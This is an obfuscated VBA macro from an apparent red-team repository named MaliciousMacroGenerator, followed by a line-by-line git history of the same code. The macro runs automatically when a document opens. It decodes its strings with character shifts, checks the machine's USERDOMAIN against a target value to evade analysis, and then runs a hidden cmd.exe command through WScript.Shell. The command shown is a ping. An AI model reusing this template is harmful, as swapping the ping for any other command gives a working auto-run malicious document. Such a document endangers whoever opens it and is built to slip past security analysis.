MaliciousMacroGenerator/examples/generic-cmd-domain-evasion.vba

Sub AutoOpen()
	Dim sWPZY As String
	Dim WOccADRx As String
	Dim bABhOuXJydA As String
	Dim ardWiFyrGjAfdUardr As String
	Dim LKEyllGPITSmwGKW As String
	Dim qkePprvZWufh As Integer
	Dim dALlVQuU As Integer
	Dim KVfVBTCCnNHstoZ As Integer

	qkePprvZWufh = 08
	dALlVQuU = 8774
	KVfVBTCCnNHstoZ = 9228
	WOccADRx = "YsZqkFH"
	sWPZY = "qhTbdUdNaRTMSe"
	LKEyllGPITSmwGKW = "Zvfulsw1Vkhoo"
	sWPZY = SSuSi(sWPZY, WOccADRx, qkePprvZWufh)
	WOccADRx = "ZUvPOvbpPcxpuAu"
	bABhOuXJydA = SSuSi(WOccADRx, sWPZY, dALlVQuU)
	If (bABhOuXJydA = "NhSCrpId") Then
		Dim vOMLPMyyZYkvaZHzZ As Object
		ardWiFyrGjAfdUardr = "bZqInZfWXQzQBsTQi"
		ardWiFyrGjAfdUardr = SSuSi(ardWiFyrGjAfdUardr, LKEyllGPITSmwGKW, KVfVBTCCnNHstoZ)
		Set vOMLPMyyZYkvaZHzZ = CreateObject(ardWiFyrGjAfdUardr)
		ardWiFyrGjAfdUardr = UYsKPYLh(ardWiFyrGjAfdUardr)
		Dim TwLlqyvqjVzLaNYolg As String
		TwLlqyvqjVzLaNYolg = ardWiFyrGjAfdUardr
		ardWiFyrGjAfdUardr = "WaejIu"
		TwLlqyvqjVzLaNYolg = SSuSi(ardWiFyrGjAfdUardr, TwLlqyvqjVzLaNYolg, KVfVBTCCnNHstoZ)
		TwLlqyvqjVzLaNYolg = zfoirBRnoJYhagrWDnw(vOMLPMyyZYkvaZHzZ, TwLlqyvqjVzLaNYolg, qkePprvZWufh)
		Set vOMLPMyyZYkvaZHzZ = Nothing
	End If
End Sub

Function SSuSi(yeYpCfLZeGJjiAGpK As String, mZgQbZLimgLaJQnjFF As String, bKwQaV As Integer) As String
    If (bKwQaV > 1) Then
        SSuSi = Application.Run(yeYpCfLZeGJjiAGpK, mZgQbZLimgLaJQnjFF)
    End If
End Function

Function ZUvPOvbpPcxpuAu(cJegRCSEWgBjlJJx As String) As String
    Dim pQzVC As String
    Dim ZrkBNSJlXO As String
    Dim SyaapMcoatOecKMlfh As String
    Dim RBQkuIiLBDUB As Integer
    RBQkuIiLBDUB = 46
    ZrkBNSJlXO = "ZlpuLmAgpOAzojZ"
    SyaapMcoatOecKMlfh = "VMRK^IV4"
    ZrkBNSJlXO = SSuSi(ZrkBNSJlXO, SyaapMcoatOecKMlfh, RBQkuIiLBDUB)
    pQzVC = ZrkBNSJlXO
    If (UCase(cJegRCSEWgBjlJJx) = pQzVC) Then
        ZUvPOvbpPcxpuAu = "NhSCrpId"
    Else
        ZUvPOvbpPcxpuAu = "vuaxdRoVAOuRfQZjfY"
    End If
End Function

Function qhTbdUdNaRTMSe(hJmyjEQHyNpnyxiPsy As String) As String
    Dim THanLAjHtTaYB As String
	Dim uVvVkjmIAAJxwLAzJ As String
	Dim pnyVJTLwVUgCBt As Integer
	pnyVJTLwVUgCBt = 571
	uVvVkjmIAAJxwLAzJ = "bZqInZfWXQzQBsTQi"
	uVvVkjmIAAJxwLAzJ = SSuSi(uVvVkjmIAAJxwLAzJ, "XVHUGRPDLQ", pnyVJTLwVUgCBt)
    THanLAjHtTaYB = Environ(uVvVkjmIAAJxwLAzJ)
	uVvVkjmIAAJxwLAzJ = UYsKPYLh(uVvVkjmIAAJxwLAzJ)
    qhTbdUdNaRTMSe = THanLAjHtTaYB
End Function

Function bZqInZfWXQzQBsTQi(ZgLaLNtXGZr As String) As String
    Dim wDuWUIvZdpOFpBmTsL As Long
    Dim lMBixlCj As String
	Dim JRGUODxKgaqCxBqMp As Integer
	JRGUODxKgaqCxBqMp = 3
    For wDuWUIvZdpOFpBmTsL = 1 To Len(ZgLaLNtXGZr)
        lMBixlCj = lMBixlCj & Chr(Asc(Mid(ZgLaLNtXGZr, wDuWUIvZdpOFpBmTsL, 1)) - JRGUODxKgaqCxBqMp)
    Next wDuWUIvZdpOFpBmTsL
	zKOwZY = UYsKPYLh(lMBixlCj)
    bZqInZfWXQzQBsTQi = lMBixlCj
End Function

Function WaejIu(KrhzV As String) As String
	Dim FICAgsIxQnFtC As String
	Dim kBnbIdOdsfC As String
	Dim MxOlSj As String
	MxOlSj = "gqh2i|i$3g$tmrk$vmrk~iv4xieq2gsq"

	FICAgsIxQnFtC = MxOlSj
	FICAgsIxQnFtC = ZlpuLmAgpOAzojZ(FICAgsIxQnFtC)
	WaejIu = FICAgsIxQnFtC
End Function

Function ZlpuLmAgpOAzojZ(ZwbChxsOiEPAvklfkqA As String) As String
    Dim zABfIiRGJPhhUJvCezL As Long
    Dim DandPxORPcmx As String
	Dim PdtALUSGGKWDF As Integer
	PdtALUSGGKWDF = 4
    For zABfIiRGJPhhUJvCezL = 1 To Len(ZwbChxsOiEPAvklfkqA)
        DandPxORPcmx = DandPxORPcmx & Chr(Asc(Mid(ZwbChxsOiEPAvklfkqA, zABfIiRGJPhhUJvCezL, 1)) - PdtALUSGGKWDF)
    Next zABfIiRGJPhhUJvCezL
	zKOwZY = UYsKPYLh(DandPxORPcmx)
    ZlpuLmAgpOAzojZ = DandPxORPcmx
End Function

Function UYsKPYLh(pkoQrH As String) As String
	Dim UnuWgcgPXohHEbXQdPN As Integer
	Dim RFrGdQpe As String
	If (UCase(pkoQrH) = "DlWSgYYpBiOPohje") Then
		UnuWgcgPXohHEbXQdPN = 3
	Else
		UnuWgcgPXohHEbXQdPN = 0
	End If
	VBYyWiljGi = ZllMpgR(pkoQrH, UnuWgcgPXohHEbXQdPN)
	If (VBYyWiljGi = "XmWmz") Then
		UYsKPYLh = VBYyWiljGi
	Else
		UYsKPYLh = "sVOsmsQCjMyn"
	End If
End Function

Function zfoirBRnoJYhagrWDnw(UnPrP As Object, ivmktxrCBwHQYiy As String, rDRZollclM As Integer) As String
	Dim QaRFIYqpNhP As String
	Dim GoxFYZHAlVmE As Integer
	GoxFYZHAlVmE = 1
	QaRFIYqpNhP = ivmktxrCBwHQYiy
    If (rDRZollclM > GoxFYZHAlVmE) Then
		GoxFYZHAlVmE = GoxFYZHAlVmE - 1
		UnPrP.Run QaRFIYqpNhP, GoxFYZHAlVmE, True
	End If
	QaRFIYqpNhP = "cJISnaKwbtVzjdRl"
	zfoirBRnoJYhagrWDnw = QaRFIYqpNhP
End Function

Function ZllMpgR(MWhxSodjH As String, OLBNtgtWYcN As Integer) As String
    Dim DlWSgYYpBiOPohje As Long
    Dim VaPyTazXZIHVnicP As String
    For DlWSgYYpBiOPohje = 1 To Len(MWhxSodjH)
        VaPyTazXZIHVnicP = VaPyTazXZIHVnicP & Chr(Asc(Mid(MWhxSodjH, DlWSgYYpBiOPohje, 1)) - OLBNtgtWYcN)
    Next DlWSgYYpBiOPohje
    ZllMpgR = VaPyTazXZIHVnicP
End Function
Add files via upload 2016-09-21 23:33:01 +00:00			`Sub AutoOpen()`
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Dim sWPZY As String`
			`Dim WOccADRx As String`
			`Dim bABhOuXJydA As String`
			`Dim ardWiFyrGjAfdUardr As String`
			`Dim LKEyllGPITSmwGKW As String`
			`Dim qkePprvZWufh As Integer`
			`Dim dALlVQuU As Integer`
			`Dim KVfVBTCCnNHstoZ As Integer`
Add files via upload 2016-09-21 23:33:01 +00:00
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`qkePprvZWufh = 08`
			`dALlVQuU = 8774`
			`KVfVBTCCnNHstoZ = 9228`
			`WOccADRx = "YsZqkFH"`
			`sWPZY = "qhTbdUdNaRTMSe"`
			`LKEyllGPITSmwGKW = "Zvfulsw1Vkhoo"`
			`sWPZY = SSuSi(sWPZY, WOccADRx, qkePprvZWufh)`
			`WOccADRx = "ZUvPOvbpPcxpuAu"`
			`bABhOuXJydA = SSuSi(WOccADRx, sWPZY, dALlVQuU)`
			`If (bABhOuXJydA = "NhSCrpId") Then`
			`Dim vOMLPMyyZYkvaZHzZ As Object`
			`ardWiFyrGjAfdUardr = "bZqInZfWXQzQBsTQi"`
			`ardWiFyrGjAfdUardr = SSuSi(ardWiFyrGjAfdUardr, LKEyllGPITSmwGKW, KVfVBTCCnNHstoZ)`
			`Set vOMLPMyyZYkvaZHzZ = CreateObject(ardWiFyrGjAfdUardr)`
			`ardWiFyrGjAfdUardr = UYsKPYLh(ardWiFyrGjAfdUardr)`
			`Dim TwLlqyvqjVzLaNYolg As String`
			`TwLlqyvqjVzLaNYolg = ardWiFyrGjAfdUardr`
			`ardWiFyrGjAfdUardr = "WaejIu"`
			`TwLlqyvqjVzLaNYolg = SSuSi(ardWiFyrGjAfdUardr, TwLlqyvqjVzLaNYolg, KVfVBTCCnNHstoZ)`
			`TwLlqyvqjVzLaNYolg = zfoirBRnoJYhagrWDnw(vOMLPMyyZYkvaZHzZ, TwLlqyvqjVzLaNYolg, qkePprvZWufh)`
			`Set vOMLPMyyZYkvaZHzZ = Nothing`
Add files via upload 2016-09-21 23:33:01 +00:00			`End If`
			`End Sub`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function SSuSi(yeYpCfLZeGJjiAGpK As String, mZgQbZLimgLaJQnjFF As String, bKwQaV As Integer) As String`
			`If (bKwQaV > 1) Then`
			`SSuSi = Application.Run(yeYpCfLZeGJjiAGpK, mZgQbZLimgLaJQnjFF)`
Add files via upload 2016-09-21 23:33:01 +00:00			`End If`
			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function ZUvPOvbpPcxpuAu(cJegRCSEWgBjlJJx As String) As String`
			`Dim pQzVC As String`
			`Dim ZrkBNSJlXO As String`
			`Dim SyaapMcoatOecKMlfh As String`
			`Dim RBQkuIiLBDUB As Integer`
			`RBQkuIiLBDUB = 46`
			`ZrkBNSJlXO = "ZlpuLmAgpOAzojZ"`
			`SyaapMcoatOecKMlfh = "VMRK^IV4"`
			`ZrkBNSJlXO = SSuSi(ZrkBNSJlXO, SyaapMcoatOecKMlfh, RBQkuIiLBDUB)`
			`pQzVC = ZrkBNSJlXO`
			`If (UCase(cJegRCSEWgBjlJJx) = pQzVC) Then`
			`ZUvPOvbpPcxpuAu = "NhSCrpId"`
Add files via upload 2016-09-21 23:33:01 +00:00			`Else`
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`ZUvPOvbpPcxpuAu = "vuaxdRoVAOuRfQZjfY"`
Add files via upload 2016-09-21 23:33:01 +00:00			`End If`
			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function qhTbdUdNaRTMSe(hJmyjEQHyNpnyxiPsy As String) As String`
			`Dim THanLAjHtTaYB As String`
			`Dim uVvVkjmIAAJxwLAzJ As String`
			`Dim pnyVJTLwVUgCBt As Integer`
			`pnyVJTLwVUgCBt = 571`
			`uVvVkjmIAAJxwLAzJ = "bZqInZfWXQzQBsTQi"`
			`uVvVkjmIAAJxwLAzJ = SSuSi(uVvVkjmIAAJxwLAzJ, "XVHUGRPDLQ", pnyVJTLwVUgCBt)`
			`THanLAjHtTaYB = Environ(uVvVkjmIAAJxwLAzJ)`
			`uVvVkjmIAAJxwLAzJ = UYsKPYLh(uVvVkjmIAAJxwLAzJ)`
			`qhTbdUdNaRTMSe = THanLAjHtTaYB`
Add files via upload 2016-09-21 23:33:01 +00:00			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function bZqInZfWXQzQBsTQi(ZgLaLNtXGZr As String) As String`
			`Dim wDuWUIvZdpOFpBmTsL As Long`
			`Dim lMBixlCj As String`
			`Dim JRGUODxKgaqCxBqMp As Integer`
			`JRGUODxKgaqCxBqMp = 3`
			`For wDuWUIvZdpOFpBmTsL = 1 To Len(ZgLaLNtXGZr)`
			`lMBixlCj = lMBixlCj & Chr(Asc(Mid(ZgLaLNtXGZr, wDuWUIvZdpOFpBmTsL, 1)) - JRGUODxKgaqCxBqMp)`
			`Next wDuWUIvZdpOFpBmTsL`
			`zKOwZY = UYsKPYLh(lMBixlCj)`
			`bZqInZfWXQzQBsTQi = lMBixlCj`
Add files via upload 2016-09-21 23:33:01 +00:00			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function WaejIu(KrhzV As String) As String`
			`Dim FICAgsIxQnFtC As String`
			`Dim kBnbIdOdsfC As String`
			`Dim MxOlSj As String`
			`MxOlSj = "gqh2i\|i$3g$tmrk$vmrk~iv4xieq2gsq"`
Add files via upload 2016-09-21 23:33:01 +00:00
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`FICAgsIxQnFtC = MxOlSj`
			`FICAgsIxQnFtC = ZlpuLmAgpOAzojZ(FICAgsIxQnFtC)`
			`WaejIu = FICAgsIxQnFtC`
Add files via upload 2016-09-21 23:33:01 +00:00			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function ZlpuLmAgpOAzojZ(ZwbChxsOiEPAvklfkqA As String) As String`
			`Dim zABfIiRGJPhhUJvCezL As Long`
			`Dim DandPxORPcmx As String`
			`Dim PdtALUSGGKWDF As Integer`
			`PdtALUSGGKWDF = 4`
			`For zABfIiRGJPhhUJvCezL = 1 To Len(ZwbChxsOiEPAvklfkqA)`
			`DandPxORPcmx = DandPxORPcmx & Chr(Asc(Mid(ZwbChxsOiEPAvklfkqA, zABfIiRGJPhhUJvCezL, 1)) - PdtALUSGGKWDF)`
			`Next zABfIiRGJPhhUJvCezL`
			`zKOwZY = UYsKPYLh(DandPxORPcmx)`
			`ZlpuLmAgpOAzojZ = DandPxORPcmx`
			`End Function`

			`Function UYsKPYLh(pkoQrH As String) As String`
			`Dim UnuWgcgPXohHEbXQdPN As Integer`
			`Dim RFrGdQpe As String`
			`If (UCase(pkoQrH) = "DlWSgYYpBiOPohje") Then`
			`UnuWgcgPXohHEbXQdPN = 3`
Add files via upload 2016-09-21 23:33:01 +00:00			`Else`
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`UnuWgcgPXohHEbXQdPN = 0`
Add files via upload 2016-09-21 23:33:01 +00:00			`End If`
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`VBYyWiljGi = ZllMpgR(pkoQrH, UnuWgcgPXohHEbXQdPN)`
			`If (VBYyWiljGi = "XmWmz") Then`
			`UYsKPYLh = VBYyWiljGi`
Add files via upload 2016-09-21 23:33:01 +00:00			`Else`
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`UYsKPYLh = "sVOsmsQCjMyn"`
Add files via upload 2016-09-21 23:33:01 +00:00			`End If`
			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function zfoirBRnoJYhagrWDnw(UnPrP As Object, ivmktxrCBwHQYiy As String, rDRZollclM As Integer) As String`
			`Dim QaRFIYqpNhP As String`
			`Dim GoxFYZHAlVmE As Integer`
			`GoxFYZHAlVmE = 1`
			`QaRFIYqpNhP = ivmktxrCBwHQYiy`
			`If (rDRZollclM > GoxFYZHAlVmE) Then`
			`GoxFYZHAlVmE = GoxFYZHAlVmE - 1`
			`UnPrP.Run QaRFIYqpNhP, GoxFYZHAlVmE, True`
Add files via upload 2016-09-21 23:33:01 +00:00			`End If`
Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`QaRFIYqpNhP = "cJISnaKwbtVzjdRl"`
			`zfoirBRnoJYhagrWDnw = QaRFIYqpNhP`
Add files via upload 2016-09-21 23:33:01 +00:00			`End Function`

Update domain-evasion.vba 2016-09-22 16:28:49 +00:00			`Function ZllMpgR(MWhxSodjH As String, OLBNtgtWYcN As Integer) As String`
			`Dim DlWSgYYpBiOPohje As Long`
			`Dim VaPyTazXZIHVnicP As String`
			`For DlWSgYYpBiOPohje = 1 To Len(MWhxSodjH)`
			`VaPyTazXZIHVnicP = VaPyTazXZIHVnicP & Chr(Asc(Mid(MWhxSodjH, DlWSgYYpBiOPohje, 1)) - OLBNtgtWYcN)`
			`Next DlWSgYYpBiOPohje`
			`ZllMpgR = VaPyTazXZIHVnicP`
Rename malicious.vba to examples/malicious.vba 2016-09-21 23:34:21 +00:00			`End Function`